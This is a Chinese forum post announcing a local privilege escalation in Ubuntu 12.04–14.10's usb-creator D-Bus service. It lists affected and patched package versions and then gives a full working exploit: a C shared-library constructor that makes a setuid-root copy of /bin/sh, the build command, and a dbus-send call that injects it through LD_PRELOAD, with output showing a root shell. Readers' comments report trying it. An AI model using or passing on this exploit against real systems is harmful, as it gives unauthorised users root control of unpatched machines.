Ubuntu曝本地权限提升漏洞,影响12.04 – 14.10版本(含EXP)
Ubuntu12.04-14.10曝出本地权限提升漏洞,该漏洞由Google的大神Tavis Ormandy发出,包含漏洞利用测试程序。
影响版本:
Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu (Patched in: 0.2.38.3ubuntu0.1)
Ubuntu Trusty (14.04LTS) <= usb-creator 0.2.56.3ubuntu (Patched in: 0.2.56.3ubuntu0.1)
Ubuntu Utopic (14.10) <= usb-creator 0.2.62ubuntu0.2 (Patched in: 0.2.62ubuntu0.3)
EXP:大家试试看。
影响版本:
Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu (Patched in: 0.2.38.3ubuntu0.1)
Ubuntu Trusty (14.04LTS) <= usb-creator 0.2.56.3ubuntu (Patched in: 0.2.56.3ubuntu0.1)
Ubuntu Utopic (14.10) <= usb-creator 0.2.62ubuntu0.2 (Patched in: 0.2.62ubuntu0.3)
EXP:
$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)
评论20次
我这也不行,不知道什么情况,再试试
刚发现这个EXP, 用了下,提权成功了。
有时间搭环境测下
看到 usb-creator,这个软件应该不是默认的吧, 找时间测试一下
测试下先
12.04测试失败了
测试下先
测试失败,难道是我的姿势不对?
恩,0day本地假设测试OK。藏起来。
又见0day 握了棵草
有时间试验下
要求是必须要挂载usbcreator服务?Ubuntu默认挂载?
挺鸡肋的,需要某些特定的条件
同测试失败 ,坐等大神
楼上测试的结果如何
执行第10行的命令的时候和第11行的返回结果不一样,失败了
http://www.jianzhen-lab.com/601.html
谢谢分享,明天再试试
测试失败啊,
楼上测试的结果如何
执行第10行的命令的时候和第11行的返回结果不一样,失败了
http://www.jianzhen-lab.com/601.html
楼上测试的结果如何
执行第10行的命令的时候和第11行的返回结果不一样,失败了
楼上测试的结果如何
赶快测试一下